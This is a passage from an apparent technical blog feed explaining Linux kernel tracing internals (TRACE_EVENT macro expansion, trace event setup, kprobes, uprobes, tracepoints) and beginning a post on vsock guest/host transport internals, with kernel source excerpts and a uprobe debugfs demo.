<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef __entry
#define __entry entry
#undef __field
#define __field(type, item)
#undef __field_struct
#define __field_struct(type, item)
#undef __array
#define __array(type, item, len)
#undef __dynamic_array
#define __dynamic_array(type, item, len) \
__entry->__data_loc_##item = __data_offsets.item;
#undef __string
#define __string(item, src) __dynamic_array(char, item, -1)
#undef __assign_str
#define __assign_str(dst, src) \
strcpy(__get_str(dst), (src) ? (const char *)(src) : "(null)");
#undef __bitmask
#define __bitmask(item, nr_bits) __dynamic_array(unsigned long, item, -1)
#undef __get_bitmask
#define __get_bitmask(field) (char *)__get_dynamic_array(field)
#undef __assign_bitmask
#define __assign_bitmask(dst, src, nr_bits) \
memcpy(__get_bitmask(dst), (src), __bitmask_size_in_bytes(nr_bits))
#undef TP_fast_assign
#define TP_fast_assign(args...) args
#undef __perf_count
#define __perf_count(c) (c)
#undef __perf_task
#define __perf_task(t) (t)
#undef DECLARE_EVENT_CLASS
#define DECLARE_EVENT_CLASS(call, proto, args, tstruct, assign, print) \
\
static notrace void \
trace_event_raw_event_##call(void *__data, proto) \
{ \
struct trace_event_file *trace_file = __data; \
struct trace_event_data_offsets_##call __maybe_unused __data_offsets;\
struct trace_event_buffer fbuffer; \
struct trace_event_raw_##call *entry; \
int __data_size; \
\
if (trace_trigger_soft_disabled(trace_file)) \
return; \
\
__data_size = trace_event_get_offsets_##call(&__data_offsets, args); \
\
entry = trace_event_buffer_reserve(&fbuffer, trace_file, \
sizeof(*entry) + __data_size); \
\
if (!entry) \
return; \
\
tstruct \
\
{ assign; } \
\
trace_event_buffer_commit(&fbuffer); \
}
</code></pre></div></div>
<p>Here the function ‘trace_event_raw_event_##call’ is defined. It calls ‘trace_trigger_soft_disabled’ to determine whether it should record data, then ‘trace_event_get_offsets_##call’ to calculate the dynamic data’s offset and size. It calls ‘trace_event_buffer_reserve’ to reserve space in the ring buffer; the ‘tstruct’ part assigns ‘__entry->__data_loc_##item’; finally it commits the record by calling ‘trace_event_buffer_commit’.</p>
<h4> Ninth definition of 'TRACE_EVENT' </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef __entry
#define __entry REC
#undef __print_flags
#undef __print_symbolic
#undef __print_hex
#undef __print_hex_str
#undef __get_dynamic_array
#undef __get_dynamic_array_len
#undef __get_str
#undef __get_bitmask
#undef __print_array
#undef TP_printk
#define TP_printk(fmt, args...) "\"" fmt "\", " __stringify(args)
#undef DECLARE_EVENT_CLASS
#define DECLARE_EVENT_CLASS(call, proto, args, tstruct, assign, print) \
_TRACE_PERF_PROTO(call, PARAMS(proto)); \
static char print_fmt_##call[] = print; \
static struct trace_event_class __used __refdata event_class_##call = { \
.system = TRACE_SYSTEM_STRING, \
.define_fields = trace_event_define_fields_##call, \
.fields = LIST_HEAD_INIT(event_class_##call.fields),\
.raw_init = trace_event_raw_init, \
.probe = trace_event_raw_event_##call, \
.reg = trace_event_reg, \
_TRACE_PERF_INIT(call) \
};
#undef DEFINE_EVENT
#define DEFINE_EVENT(template, call, proto, args) \
\
static struct trace_event_call __used event_##call = { \
.class = &event_class_##template, \
{ \
.tp = &__tracepoint_##call, \
}, \
.event.funcs = &trace_event_type_funcs_##template, \
.print_fmt = print_fmt_##template, \
.flags = TRACE_EVENT_FL_TRACEPOINT, \
}; \
static struct trace_event_call __used \
__attribute__((section("_ftrace_events"))) *__event_##call = &event_##call
</code></pre></div></div>
<p>Here a ‘struct trace_event_class’ named ‘event_class_##call’ and a ‘struct trace_event_call’ named ‘event_##call’ are defined. The probe callback of the class is ‘trace_event_raw_event_##call’, which was defined in the eighth-round expansion. All of the ‘event_##call’ structures are stored in the ‘_ftrace_events’ section.</p>
<p>That is the story of ‘TRACE_EVENT’: quite a whirlwind of macro operations (一顿操作猛如虎, “a flurry of moves fierce as a tiger”). Let’s summarize what we have done so far.</p>
<p><img src="/assets/img/trace/1.png" alt="" /></p>
<p>In ‘TRACE_EVENT’ we have defined a ‘trace_event_call’ and some related functions and structures. The most important is ‘trace_event_class’’s probe function ‘trace_event_raw_event_##call’. When code calls the trace function (‘trace_me_silly’ for example), it invokes the tracepoint’s funcs callbacks, i.e. the ‘probe’ function. The probe function ‘trace_event_raw_event_##call’ reserves ring buffer space, fills in the data and commits the buffer; later, ‘trace_raw_output_##call’ copies the ring buffer data to the output buffer. Next let’s see how this happens.</p>
<h3> trace event init </h3>
<p>The ftrace framework is another complicated thing, so here let’s just focus on the trace event part.</p>
<p>Some of the important functions in the trace event init process are the following:</p>
<p>start_kernel()
->early_trace_init()
->trace_init()
->event_trace_enable()
->event_init()
->__trace_early_add_events()
->__trace_early_add_new_event()
->trace_create_new_event()</p>
<p>In event_trace_enable(), it iterates over the ‘_ftrace_events’ section. For every ‘trace_event_call’, it calls ‘event_init’, which invokes ‘call->class->raw_init()’; this is trace_event_raw_init.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int event_init(struct trace_event_call *call)
{
int ret = 0;
const char *name;
name = trace_event_name(call);
if (WARN_ON(!name))
return -EINVAL;
if (call->class->raw_init) {
ret = call->class->raw_init(call);
if (ret < 0 && ret != -ENOSYS)
pr_warn("Could not initialize trace events/%s\n", name);
}
return ret;
}
</code></pre></div></div>
<p>trace_event_raw_init calls register_trace_event, which initializes the ‘trace_event’ member named ‘event’ in ‘trace_event_call’ and inserts the ‘trace_event’ into a global ‘event_hash’ hash table.</p>
<p>event_trace_enable will also insert the ‘trace_event_call’ into the global ‘ftrace_events’ linked list.</p>
<p>In ‘__trace_early_add_events’s call chain, a ‘trace_event_file’ will be created for every ‘trace_event_call’ (by ‘trace_create_new_event’).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct trace_event_file *
trace_create_new_event(struct trace_event_call *call,
struct trace_array *tr)
{
struct trace_event_file *file;
file = kmem_cache_alloc(file_cachep, GFP_TRACE);
if (!file)
return NULL;
file->event_call = call;
file->tr = tr;
atomic_set(&file->sm_ref, 0);
atomic_set(&file->tm_ref, 0);
INIT_LIST_HEAD(&file->triggers);
list_add(&file->list, &tr->events);
return file;
}
</code></pre></div></div>
<p>Later, in fs_initcall(event_trace_init), the directories and files for the events are created:
event_trace_init()
->early_event_add_tracer()
->__trace_early_add_event_dirs()
->event_create_dir()</p>
<p>In the final ‘event_create_dir’ function, we create the directory and files; it may also create a subsystem directory.</p>
<h3> enable trace event </h3>
<p>When we write to the ‘enable’ file, ‘event_enable_write’ handles it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (call->class->reg && !(call->flags & TRACE_EVENT_FL_IGNORE_ENABLE))
trace_create_file("enable", 0644, file->dir, file,
&ftrace_enable_fops);
static const struct file_operations ftrace_enable_fops = {
.open = tracing_open_generic,
.read = event_enable_read,
.write = event_enable_write,
.llseek = default_llseek,
};
static ssize_t
event_enable_write(struct file *filp, const char __user *ubuf, size_t cnt,
loff_t *ppos)
{
struct trace_event_file *file;
unsigned long val;
int ret;
ret = kstrtoul_from_user(ubuf, cnt, 10, &val);
if (ret)
return ret;
ret = tracing_update_buffers();
if (ret < 0)
return ret;
switch (val) {
case 0:
case 1:
ret = -ENODEV;
mutex_lock(&event_mutex);
file = event_file_data(filp);
if (likely(file))
ret = ftrace_event_enable_disable(file, val);
mutex_unlock(&event_mutex);
break;
default:
return -EINVAL;
}
*ppos += cnt;
return ret ? ret : cnt;
}
</code></pre></div></div>
<p>After the call chain ftrace_event_enable_disable->__ftrace_event_enable_disable->call->class->reg, the ‘trace_event_class’s reg callback will be called.
This is ‘trace_event_reg’. ‘call->class->probe’ is ‘trace_event_raw_event_##call’. After a long call chain, ‘trace_event_raw_event_##call’ is added to the
‘tracepoint’s funcs member.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int trace_event_reg(struct trace_event_call *call,
enum trace_reg type, void *data)
{
struct trace_event_file *file = data;
WARN_ON(!(call->flags & TRACE_EVENT_FL_TRACEPOINT));
switch (type) {
case TRACE_REG_REGISTER:
return tracepoint_probe_register(call->tp,
call->class->probe,
file);
case TRACE_REG_UNREGISTER:
tracepoint_probe_unregister(call->tp,
call->class->probe,
file);
return 0;
...
return 0;
}
</code></pre></div></div>
<p>‘tracepoint_probe_register’ will be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int tracepoint_probe_register(struct tracepoint *tp, void *probe, void *data)
{
return tracepoint_probe_register_prio(tp, probe, data, TRACEPOINT_DEFAULT_PRIO);
}
int tracepoint_probe_register_prio(struct tracepoint *tp, void *probe,
void *data, int prio)
{
struct tracepoint_func tp_func;
int ret;
mutex_lock(&tracepoints_mutex);
tp_func.func = probe;
tp_func.data = data;
tp_func.prio = prio;
ret = tracepoint_add_func(tp, &tp_func, prio);
mutex_unlock(&tracepoints_mutex);
return ret;
}
static int tracepoint_add_func(struct tracepoint *tp,
struct tracepoint_func *func, int prio)
{
struct tracepoint_func *old, *tp_funcs;
int ret;
if (tp->regfunc && !static_key_enabled(&tp->key)) {
ret = tp->regfunc();
if (ret < 0)
return ret;
}
tp_funcs = rcu_dereference_protected(tp->funcs,
lockdep_is_held(&tracepoints_mutex));
old = func_add(&tp_funcs, func, prio);
if (IS_ERR(old)) {
WARN_ON_ONCE(1);
return PTR_ERR(old);
}
/*
* rcu_assign_pointer has a smp_wmb() which makes sure that the new
* probe callbacks array is consistent before setting a pointer to it.
* This array is referenced by __DO_TRACE from
* include/linux/tracepoints.h. A matching smp_read_barrier_depends()
* is used.
*/
rcu_assign_pointer(tp->funcs, tp_funcs);
if (!static_key_enabled(&tp->key))
static_key_slow_inc(&tp->key);
release_probes(old);
return 0;
}
</code></pre></div></div>
Linux tracing - kprobe, uprobe and tracepoint2020-08-05T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/08/05/tracing-basic
<h3> Background </h3>
<p>The Linux tracing system is confusing because tracing has many faces. There is a lot of terminology around tracing, such as ftrace, kprobe, uprobe and trace events.</p>
<p>Julia Evans has written a blog post <a href="https://jvns.ca/blog/2017/07/05/linux-tracing-systems/#ftrace">Linux tracing systems & how they fit together</a> to clarify these by splitting Linux tracing systems into data sources (where the tracing data comes from), mechanisms for collecting data from those sources (like “ftrace”) and tracing frontends (the tool you actually interact with to collect/analyse data).</p>
<p>In this post, I will summarize the mechanisms behind the data sources. Steven Rostedt’s slides <a href="https://static.sched.com/hosted_files/osseu19/5f/unified-tracing-platform-oss-eu-2019.pdf">Unified Tracing Platform</a> list the basic event sources: kprobes, uprobes and tracepoints.</p>
<p>I will give one example of each data source and summarize how each mechanism works in the Linux kernel.</p>
<h3> kprobe </h3>
<h4> kprobe usage </h4>
<p>The following is a raw usage of kprobe, with minor adjustments from samples/kprobes/kprobe_example.c in the kernel tree:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <linux/kernel.h>
#include <linux/module.h>
#include <linux/kprobes.h>
#define MAX_SYMBOL_LEN 64
static char symbol[MAX_SYMBOL_LEN] = "_do_fork";
module_param_string(symbol, symbol, sizeof(symbol), 0644);
/* For each probe you need to allocate a kprobe structure */
static struct kprobe kp = {
.symbol_name = symbol,
};
/* kprobe pre_handler: called just before the probed instruction is executed */
static int handler_pre(struct kprobe *p, struct pt_regs *regs)
{
pr_info("<%s> pre_handler: name = %s, p->addr = 0x%p, ip = %lx, flags = 0x%lx\n",
p->symbol_name, current->comm, p->addr, regs->ip, regs->flags);
return 0;
}
/* kprobe post_handler: called after the probed instruction is executed */
static void handler_post(struct kprobe *p, struct pt_regs *regs,
unsigned long flags)
{
pr_info("<%s> post_handler: p->addr = 0x%p, flags = 0x%lx\n",
p->symbol_name, p->addr, regs->flags);
}
/*
* fault_handler: this is called if an exception is generated for any
* instruction within the pre- or post-handler, or when Kprobes
* single-steps the probed instruction.
*/
static int handler_fault(struct kprobe *p, struct pt_regs *regs, int trapnr)
{
pr_info("fault_handler: p->addr = 0x%p, trap #%d\n", p->addr, trapnr);
/* Return 0 because we don't handle the fault. */
return 0;
}
static int __init kprobe_init(void)
{
int ret;
kp.pre_handler = handler_pre;
kp.post_handler = handler_post;
kp.fault_handler = handler_fault;
ret = register_kprobe(&kp);
if (ret < 0) {
pr_err("register_kprobe failed, returned %d\n", ret);
return ret;
}
pr_info("Planted kprobe at %p\n", kp.addr);
return 0;
}
static void __exit kprobe_exit(void)
{
unregister_kprobe(&kp);
pr_info("kprobe at %p unregistered\n", kp.addr);
}
module_init(kprobe_init)
module_exit(kprobe_exit)
MODULE_LICENSE("GPL");
</code></pre></div></div>
<p>After building and insmoding it, dmesg will show the messages.</p>
<h4> kprobe anatomy </h4>
<p>The workflow of kprobe is as follows:</p>
<ul>
<li>
<p>register_kprobe() registers a probe address (mostly a function). prepare_kprobe()->arch_prepare_kprobe(): on x86 the latter copies the instruction at the probe address and stores it. arm_kprobe()->arch_arm_kprobe(): on x86 the latter replaces the probe address’s instruction with ‘BREAKPOINT_INSTRUCTION’ (the int3 breakpoint). The kprobe is inserted into the ‘kprobe_table’ hash list.</p>
</li>
<li>
<p>When the probe address is executed, do_int3() is called to handle the exception. It calls kprobe_int3_handler(), which calls get_kprobe() to find the kprobe in the ‘kprobe_table’ hash list and then calls the registered kprobe’s pre_handler. kprobe_int3_handler() then calls ‘setup_singlestep’ to single-step the stored original instruction. After the int3 handler returns, the original probed instruction is executed.</p>
</li>
<li>
<p>After the original probed instruction completes, it triggers a single-step exception, which is handled by ‘kprobe_debug_handler’. In this function, the post_handler of the registered kprobe is executed.</p>
</li>
</ul>
<p>kretprobe is almost the same as kprobe: register_kretprobe() calls register_kprobe() to register a kprobe whose pre_handler is ‘pre_handler_kretprobe’. This function replaces the function’s normal return address with the address of ‘kretprobe_trampoline’.</p>
<h3> uprobe </h3>
<h4> uprobe usage </h4>
<p>Prepare a tiny C program:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <stdio.h>
#include <stdlib.h>
void f()
{
printf("f() called\n");
}
int main()
{
f();
return 0;
}
</code></pre></div></div>
<p>Using objdump -S, find f()’s offset in the ELF; it’s 0x64d here.
Do the uprobe as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~/uprobe# echo 'p /home/test/uprobe/test:0x64d' >> /sys/kernel/debug/tracing/uprobe_events
root@ubuntu:~/uprobe# echo 1 > /sys/kernel/debug/tracing/events/uprobes/p_test_0x64d/enable
root@ubuntu:~/uprobe# echo 1 > /sys/kernel/debug/tracing/tracing_on
root@ubuntu:~/uprobe# ./test
f() called
root@ubuntu:~/uprobe# ./test
f() called
root@ubuntu:~/uprobe# echo 0 > /sys/kernel/debug/tracing/tracing_on
root@ubuntu:~/uprobe# cat /sys/kernel/debug/tracing/trace
# tracer: nop
#
# entries-in-buffer/entries-written: 2/2 #P:8
#
# _-----=> irqs-off
# / _----=> need-resched
# | / _---=> hardirq/softirq
# || / _--=> preempt-depth
# ||| / delay
# TASK-PID CPU# |||| TIMESTAMP FUNCTION
# | | | |||| | |
test-17489 [005] d... 128037.287391: p_test_0x64d: (0x55f38badc64d)
test-17490 [004] d... 128038.998229: p_test_0x64d: (0x55c76884e64d)
</code></pre></div></div>
<h4> uprobe anatomy </h4>
<p>uprobe exports no separate interface except debugfs/tracefs. The following steps show how uprobe works.</p>
<ul>
<li>
<p>Write a uprobe event to ‘uprobe_events’: probes_write()->create_trace_uprobe(). The latter function calls kern_path() to open the ELF file and get the file’s inode, calls alloc_trace_uprobe() to allocate a trace_uprobe struct (the inode and offset are stored in this struct), and calls register_trace_uprobe() to register the trace_uprobe. register_trace_uprobe() calls ‘register_uprobe_event’ and inserts the trace_uprobe into probe_list. register_uprobe_event() initializes the ‘trace_uprobe’ struct’s member ‘trace_event_call’ and calls trace_add_event_call(). trace_add_event_call() calls __register_event() and __add_event_to_tracers(); the latter creates a directory and some files (enable, id, ...) in ‘/sys/kernel/debug/tracing/events/uprobes’. In short, when writing to ‘uprobe_events’ we just set up the structures in the trace framework.</p>
</li>
<li>
<p>When writing to ‘/sys/kernel/debug/tracing/events/uprobes/p_test_0x64d/enable’: trace_uprobe_register()->probe_event_enable()->uprobe_register(). uprobe_register calls alloc_uprobe() to allocate a ‘struct uprobe’ (storing the inode and offset in it) and calls insert_uprobe() to insert this ‘uprobe’ into the ‘uprobes_tree’ rb-tree. Then register_for_each_vma() is called to insert the breakpoint (0xcc) into the virtual memory of any currently running process that maps the file.</p>
</li>
<li>
<p>When the ELF that has a uprobe gets executed, the ELF’s text is mmapped into the process address space and uprobe_mmap() is called. In this function, build_probe_list() finds all of the uprobe points and replaces the instruction at each probed virtual address with 0xcc.</p>
</li>
<li>
<p>When execution reaches the 0xcc, it triggers an int3 exception. do_int3() calls notify_die(DIE_INT3), which invokes the callbacks registered on ‘die_chain’. The uprobe initialization function init_uprobes() registers ‘uprobe_exception_nb’, so arch_uprobe_exception_notify() is called; it calls uprobe_pre_sstep_notifier(), which sets the thread flag TIF_UPROBE. Before returning to userspace, exit_to_usermode_loop()->uprobe_notify_resume()->handle_swbp() runs; handle_swbp() calls the handlers (handler_chain) and puts the thread into single-step mode (pre_ssout).</p>
</li>
<li>
<p>After executing the original instruction, the program triggers a single-step exception. do_debug() calls notify_die(DIE_DEBUG), and handle_singlestep() is called.</p>
</li>
</ul>
<h3> tracepoint </h3>
<h4> tracepoint anatomy </h4>
<p>Older kernel versions have a standalone example of a pure tracepoint; for example, v3.8 has one in the samples/tracepoints directory. Of course it no longer works on recent kernels, because tracepoints are now tightly coupled with the
tracer (ftrace); together they are called ‘trace events’, which I will talk about in the next post.</p>
<p>‘DECLARE_TRACE’ and ‘DEFINE_TRACE’ are the key macros in tracepoint.</p>
<p>‘DECLARE_TRACE’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define DECLARE_TRACE(name, proto, args) \
__DECLARE_TRACE(name, PARAMS(proto), PARAMS(args), \
cpu_online(raw_smp_processor_id()), \
PARAMS(void *__data, proto), \
PARAMS(__data, args))
#define __DECLARE_TRACE(name, proto, args, cond, data_proto, data_args) \
extern struct tracepoint __tracepoint_##name; \
static inline void trace_##name(proto) \
{ \
if (static_key_false(&__tracepoint_##name.key)) \
__DO_TRACE(&__tracepoint_##name, \
TP_PROTO(data_proto), \
TP_ARGS(data_args), \
TP_CONDITION(cond), 0); \
if (IS_ENABLED(CONFIG_LOCKDEP) && (cond)) { \
rcu_read_lock_sched_notrace(); \
rcu_dereference_sched(__tracepoint_##name.funcs);\
rcu_read_unlock_sched_notrace(); \
} \
} \
__DECLARE_TRACE_RCU(name, PARAMS(proto), PARAMS(args), \
PARAMS(cond), PARAMS(data_proto), PARAMS(data_args)) \
static inline int \
register_trace_##name(void (*probe)(data_proto), void *data) \
{ \
return tracepoint_probe_register(&__tracepoint_##name, \
(void *)probe, data); \
} \
static inline int \
register_trace_prio_##name(void (*probe)(data_proto), void *data,\
int prio) \
{ \
return tracepoint_probe_register_prio(&__tracepoint_##name, \
(void *)probe, data, prio); \
} \
static inline int \
unregister_trace_##name(void (*probe)(data_proto), void *data) \
{ \
return tracepoint_probe_unregister(&__tracepoint_##name,\
(void *)probe, data); \
} \
static inline void \
check_trace_callback_type_##name(void (*cb)(data_proto)) \
{ \
} \
static inline bool \
trace_##name##_enabled(void) \
{ \
return static_key_false(&__tracepoint_##name.key); \
}
</code></pre></div></div>
<p>A tracepoint is represented by a ‘struct tracepoint’. The declaration</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 'extern struct tracepoint __tracepoint_##name'
</code></pre></div></div>
<p>means there will be a ‘tracepoint’ definition somewhere. In fact it is defined by the ‘DEFINE_TRACE’ macro.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct tracepoint {
const char *name; /* Tracepoint name */
struct static_key key;
int (*regfunc)(void);
void (*unregfunc)(void);
struct tracepoint_func __rcu *funcs;
};
</code></pre></div></div>
<p>‘key’ is used to determine whether the tracepoint is enabled. ‘funcs’ is the array of functions this tracepoint will call.
‘regfunc’ is the callback invoked before a function is added to the tracepoint.</p>
<p>Here we see the definition of the ‘trace_##name’ function; this is what we use in our code.</p>
<p>The ‘register_trace_##name’ function calls ‘tracepoint_probe_register’ to register a probe on the tracepoint; ‘tracepoint_add_func’ does the real work.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int tracepoint_add_func(struct tracepoint *tp,
struct tracepoint_func *func, int prio)
{
struct tracepoint_func *old, *tp_funcs;
int ret;
if (tp->regfunc && !static_key_enabled(&tp->key)) {
ret = tp->regfunc();
if (ret < 0)
return ret;
}
tp_funcs = rcu_dereference_protected(tp->funcs,
lockdep_is_held(&tracepoints_mutex));
old = func_add(&tp_funcs, func, prio);
if (IS_ERR(old)) {
WARN_ON_ONCE(1);
return PTR_ERR(old);
}
/*
* rcu_assign_pointer has a smp_wmb() which makes sure that the new
* probe callbacks array is consistent before setting a pointer to it.
* This array is referenced by __DO_TRACE from
* include/linux/tracepoints.h. A matching smp_read_barrier_depends()
* is used.
*/
rcu_assign_pointer(tp->funcs, tp_funcs);
if (!static_key_enabled(&tp->key))
static_key_slow_inc(&tp->key);
release_probes(old);
return 0;
}
</code></pre></div></div>
<p>As we can see, it just adds ‘func’ to ‘tp->funcs’, ordered by ‘prio’ (in func_add).</p>
<p>Now let’s look at the ‘DEFINE_TRACE’ macro.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define DEFINE_TRACE_FN(name, reg, unreg) \
static const char __tpstrtab_##name[] \
__attribute__((section("__tracepoints_strings"))) = #name; \
struct tracepoint __tracepoint_##name \
__attribute__((section("__tracepoints"))) = \
{ __tpstrtab_##name, STATIC_KEY_INIT_FALSE, reg, unreg, NULL };\
static struct tracepoint * const __tracepoint_ptr_##name __used \
__attribute__((section("__tracepoints_ptrs"))) = \
&__tracepoint_##name;
#define DEFINE_TRACE(name) \
DEFINE_TRACE_FN(name, NULL, NULL);
</code></pre></div></div>
<p>So here we can see the ‘struct tracepoint’ has been defined and is stored in the ‘__tracepoints’ section.</p>
<p>Now that we know how the ‘struct tracepoint’ is created, let’s see what happens when we call ‘trace_##name’. It will
call __DO_TRACE.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static inline void trace_##name(proto) \
{ \
if (static_key_false(&__tracepoint_##name.key)) \
__DO_TRACE(&__tracepoint_##name, \
TP_PROTO(data_proto), \
TP_ARGS(data_args), \
TP_CONDITION(cond), 0); \
if (IS_ENABLED(CONFIG_LOCKDEP) && (cond)) { \
rcu_read_lock_sched_notrace(); \
rcu_dereference_sched(__tracepoint_##name.funcs);\
rcu_read_unlock_sched_notrace(); \
} \
}
#define __DO_TRACE(tp, proto, args, cond, rcucheck) \
do { \
struct tracepoint_func *it_func_ptr; \
void *it_func; \
void *__data; \
\
if (!(cond)) \
return; \
if (rcucheck) { \
if (WARN_ON_ONCE(rcu_irq_enter_disabled())) \
return; \
rcu_irq_enter_irqson(); \
} \
rcu_read_lock_sched_notrace(); \
it_func_ptr = rcu_dereference_sched((tp)->funcs); \
if (it_func_ptr) { \
do { \
it_func = (it_func_ptr)->func; \
__data = (it_func_ptr)->data; \
((void(*)(proto))(it_func))(args); \
} while ((++it_func_ptr)->func); \
} \
rcu_read_unlock_sched_notrace(); \
if (rcucheck) \
rcu_irq_exit_irqson(); \
} while (0)
</code></pre></div></div>
<p>It will call the functions in the ‘tp->funcs’ array.</p>
<p>So here we have a tracepoint framework; the only remaining work is to add functions to ‘tp->funcs’. These are called ‘probe’ functions. In the old days, we could use another kernel module to do this; nowadays, however, tracepoints are tied to ftrace and together called ‘trace events’.</p>
<p>The next post will talk about how ‘trace events’ work.</p>
Linux vsock internals2020-04-18T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/04/18/vsock-internals
<h3> Background </h3>
<p>VM Sockets(vsock) is a fast and efficient communication mechanism between guest virtual machines and their host. It was added by VMware in commit <a href="https://github.com/torvalds/linux/commit/d021c344051af91f42c5ba9fdedc176740cbd238">VSOCK: Introduce VM Sockets</a>. The commit added a new socket address family named vsock and its vmci transport.</p>
<p>VM Sockets can be used in a lot of situations, such as by the VMware Tools inside the guest. As vsock is very useful, the community has developed vsock support for other hypervisors such as qemu/kvm and Hyper-V.
Red Hat added the virtio transport for vsock in <a href="https://github.com/torvalds/linux/commit/0ea9e1d3a9e3ef7d2a1462d3de6b95131dc7d872">VSOCK: Introduce virtio_transport.ko</a>; the vhost transport for the host was added in commit <a href="https://github.com/torvalds/linux/commit/433fc58e6bf2c8bd97e57153ed28e64fd78207b8">VSOCK: Introduce vhost_vsock.ko</a>. Microsoft added the Hyper-V transport in commit <a href="https://github.com/torvalds/linux/commit/ae0078fcf0a5eb3a8623bfb5f988262e0911fdb9">hv_sock: implements Hyper-V transport for Virtual Sockets (AF_VSOCK)</a>; of course this host-side transport lives in the Windows kernel and is not open source.</p>
<p>This post will focus on the virtio transport in the guest and the vhost transport in the host.</p>
<h3> Architecture </h3>
<p>The following picture is from Stefano Garzarella’s <a href="https://static.sched.com/hosted_files/devconfcz2020a/b1/DevConf.CZ_2020_vsock_v1.1.pdf">slides</a>.</p>
<p><img src="/assets/img/vsock/1.png" alt="" /></p>
<p>There are several layers here.</p>
<ul>
<li>application, uses &lt;cid, port&gt; as a socket address</li>
<li>socket layer, supports the socket API</li>
<li>AF_VSOCK address family, implements the vsock core</li>
<li>transport, transports the data between guest and host</li>
</ul>
<p>The transport layer is the one most worth discussing, as the other three just implement standard kernel interfaces.</p>
<p>The transport, as its name indicates, is used to transport data between guest and host, just like a network card transports data between local and remote sockets. There are two kinds of transports, according to the data’s flow direction.</p>
<ul>
<li>G2H: guest->host transports run in the guest; the guest vsock networking protocol uses them to communicate with the host.</li>
<li>H2G: host->guest transports run in the host; the host vsock networking protocol uses them to communicate with the guest.</li>
</ul>
<p>Usually an H2G transport is implemented as a device emulation, and the corresponding G2H transport is implemented as the emulated device’s driver. For example, in VMware the H2G transport is an emulated vmci PCI device and the G2H transport is the vmci device driver. In qemu the H2G transport is an emulated vhost-vsock device and the G2H transport is the vsock device’s driver.</p>
<p>The following picture shows the virtio (guest) and vhost (host) transports. It is also from Stefano Garzarella’s slides.</p>
<p><img src="/assets/img/vsock/2.png" alt="" /></p>
<p>The vsock socket address family and the G2H transports are implemented in the ‘net/vmw_vsock’ directory in the Linux tree.
H2G transports are implemented in the ‘drivers’ directory: vhost vsock is in ‘drivers/vhost/vsock.c’ and vmci is in the ‘drivers/misc/vmw_vmci’ directory.</p>
<p>The following picture shows the virtio&lt;-&gt;vhost transport in qemu in more detail.</p>
<p><img src="/assets/img/vsock/3.png" alt="" /></p>
<p>The following are the steps by which the guest and the host initialize their transport channel.</p>
<ol>
<li>When starting qemu, we need to add ‘-device vhost-vsock-pci,guest-cid=&lt;CID&gt;’ to the qemu cmdline.</li>
<li>load the vhost_vsock driver in host.</li>
<li>The guest kernel probes the vhost-vsock pci device and loads its driver. This virtio driver is registered in the ‘virtio_vsock_init’ function.</li>
<li>The virtio_vsock driver initializes the emulated vhost-vsock device and communicates with the vhost_vsock driver.</li>
</ol>
<p>The transport layer has a global variable named ‘transport’. Both the guest and the host side need to register their vsock transport by calling ‘vsock_core_init’. This function sets ‘transport’ to a transport implementation.</p>
<p>For example, the guest kernel function ‘virtio_vsock_init’ calls ‘vsock_core_init’ to set ‘transport’ to ‘virtio_transport.transport’, and the host kernel function ‘vhost_vsock_init’ calls ‘vsock_core_init’ to set ‘transport’ to ‘vhost_transport.transport’.</p>
<p>After initialization, the guest and host can use vsock to talk to each other.</p>
<h3> send/recv data </h3>
<p>vsock has two socket types, just like udp and tcp for ipv4. The following shows ‘vsock_stream_ops’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static const struct proto_ops vsock_stream_ops = {
.family = PF_VSOCK,
.owner = THIS_MODULE,
.release = vsock_release,
.bind = vsock_bind,
.connect = vsock_stream_connect,
.socketpair = sock_no_socketpair,
.accept = vsock_accept,
.getname = vsock_getname,
.poll = vsock_poll,
.ioctl = sock_no_ioctl,
.listen = vsock_listen,
.shutdown = vsock_shutdown,
.setsockopt = vsock_stream_setsockopt,
.getsockopt = vsock_stream_getsockopt,
.sendmsg = vsock_stream_sendmsg,
.recvmsg = vsock_stream_recvmsg,
.mmap = sock_no_mmap,
.sendpage = sock_no_sendpage,
};
</code></pre></div></div>
<p>Most of vsock’s ‘proto_ops’ are easy to understand. Here I just use the send/recv path to show how the transport layer transports data between guest and host.</p>
<h4> guest send </h4>
<p>‘vsock_stream_sendmsg’ is used to send data to the host. It calls the transport’s ‘stream_enqueue’ callback; in the guest this is ‘virtio_transport_stream_enqueue’, which creates a ‘virtio_vsock_pkt_info’ and calls ‘virtio_transport_send_pkt_info’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ssize_t
virtio_transport_stream_enqueue(struct vsock_sock *vsk,
struct msghdr *msg,
size_t len)
{
struct virtio_vsock_pkt_info info = {
.op = VIRTIO_VSOCK_OP_RW,
.type = VIRTIO_VSOCK_TYPE_STREAM,
.msg = msg,
.pkt_len = len,
.vsk = vsk,
};
return virtio_transport_send_pkt_info(vsk, &info);
}
virtio_transport_send_pkt_info
-->virtio_transport_alloc_pkt
-->virtio_transport_get_ops()->send_pkt(pkt);(virtio_transport_send_pkt)
</code></pre></div></div>
